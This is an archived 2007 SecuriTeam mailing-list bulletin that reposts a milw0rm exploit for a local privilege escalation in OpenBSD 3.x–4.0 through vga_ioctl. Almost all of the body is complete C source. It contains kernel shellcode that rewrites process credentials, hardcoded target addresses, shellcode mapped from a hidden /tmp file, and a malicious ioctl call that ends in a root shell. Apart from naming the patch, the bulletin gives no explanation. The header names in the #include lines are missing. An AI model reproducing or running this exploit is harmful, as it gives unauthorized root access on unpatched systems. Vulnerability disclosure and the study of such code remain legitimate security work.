From: SecuriTeam <support@securiteam.com.>
To: list@securiteam.com
Date: 9 Jan 2007 16:08:29 +0200
Subject: [EXPL] OpenBSD vga_ioctl Local Root (Exploit)
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id: <20070109134531.500C45859@mail.tyumen.ru.>
X-Virus-Scanned: antivirus-gw at tyumen.ru
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
OpenBSD vga_ioctl Local Root (Exploit)
------------------------------------------------------------------------
SUMMARY
DETAILS
Exploit:
/*
Critical Security OpenBSD 3.x-4.0 vga_ioctl() root exploit
Bug had been discovered by allmighty Ilja van Sprundel (ilja.netric.org)
Some code had been stolen from noir's openbsd exploit sources
Fix is available:
<ftp://ftp.openbsd.org/pub/OpenBSD/patches/4.0/i386/007_agp.patch>;
ftp://ftp.openbsd.org/pub/OpenBSD/patches/4.0/i386/007_agp.patch
Critical Security [http://www.critical.lt], Lithuania, Vilnius, 2007
Linkejimai neegzistuojancio fronto kariams ;]
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define TARGET1 "\x51\x47\x48\xd0" /* 0xd0484751 obsd 4.0 generic i386*/
#define TARGET2 "\xa9\x42\x10\xd0" /* 0xd01042a9 obsd 3.9 generic i386*/
char shellcode[]=
"\x18\x00\x00\x00"
"\x18\x00\x00\x00"
"\x18\x00\x00\x00" /* some crap */
"\x18\x00\x00\x00"
"\x18\x00\x00\x00"
"\x18\x00\x00\x00" /* jmp 0x00000018 */
"\xe8\x0f\x00\x00\x00\x78\x56\x34\x12\xfe\xca\xad"
"\xde\xad\xde\xef\xbe\x90\x90\x90\x5f\x8b\x0f\x8b" /* p_cred & u_cred
shellcode */
"\x59\x10\x31\xc0\x89\x43\x04\x8b\x13\x89\x42\x04"
"\xb8\x51\x47\x48\xd0"
"\xff\xe0";
void usage()
{
printf("Usage: crit_obsd_ex target\n\n");
printf("valid targets:\n");
printf("(1)\tobsd 4.0 generic i386\n");
printf("(2)\tobsd 3.9 generic i386\n\n");
exit(0);
}
void get_proc(pid_t pid, struct kinfo_proc *kp)
{
u_int arr[4], len;
arr[0] = CTL_KERN;
arr[1] = KERN_PROC;
arr[2] = KERN_PROC_PID;
arr[3] = pid;
len = sizeof(struct kinfo_proc);
if(sysctl(arr, 4, kp, &len, NULL, 0) < 0) {
perror("sysctl");
printf("this is an unexpected error, rerun!\n");
exit(-1);
}
}
int main(int ac, char *av[])
{
int i;
void *p;
int fd,failas;
u_long pprocadr;
struct kinfo_proc kp;
printf("\n+--------------------------------------------+\n");
printf("| Critical Security local obsd root |\n");
printf("+--------------------------------------------+\n\n");
if (ac<2) usage();
if(atoi(av[1])==1)
{
for(i=0;i<4;i++)shellcode[61+i]=TARGET1[i];
}
else if(atoi(av[1])==2)
{
for(i=0;i<4;i++)shellcode[61+i]=TARGET2[i];
}
else {usage();}
get_proc((pid_t) getpid(), &kp);
pprocadr = (u_long) kp.kp_eproc.e_paddr;
shellcode[24+5] = pprocadr & 0xff;
shellcode[24+6] = (pprocadr >> 8) & 0xff;
shellcode[24+7] = (pprocadr >> 16) & 0xff;
shellcode[24+8] = (pprocadr >> 24) & 0xff;
printf("[~] shellcode size: %d\n",sizeof(shellcode));
fd=open("/tmp/. ", O_RDWR|O_CREAT, S_IRUSR|S_IWUSR);
if(fd < 0)
err(1, "open");
write(fd, shellcode, sizeof(shellcode));
if((lseek(fd, 0L, SEEK_SET)) < 0)
err(1, "lseek");
p=mmap(0, sizeof(shellcode), PROT_READ|PROT_EXEC, MAP_FIXED, fd, 0);
if (p == MAP_FAILED)
err(1, "mmap");
printf("[~] map addr: 0x%x\n",p);
printf("[~] exploiting...\n");
failas = open(AGP_DEVICE, O_RDWR);
syscall(SYS_ioctl, failas, 0x80044103, NULL);
close(failas);
close(fd);
seteuid(0);
setuid(0);
printf("[~] uid: %d euid: %d gid: %d \n", getuid(), geteuid(),getgid());
execl("/bin/sh", "cyber", NULL);
}
ADDITIONAL INFORMATION
The information has been provided by milw0rm.
The original article can be found at:
<http://www.milw0rm.com/exploits/3094>;
http://www.milw0rm.com/exploits/3094
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
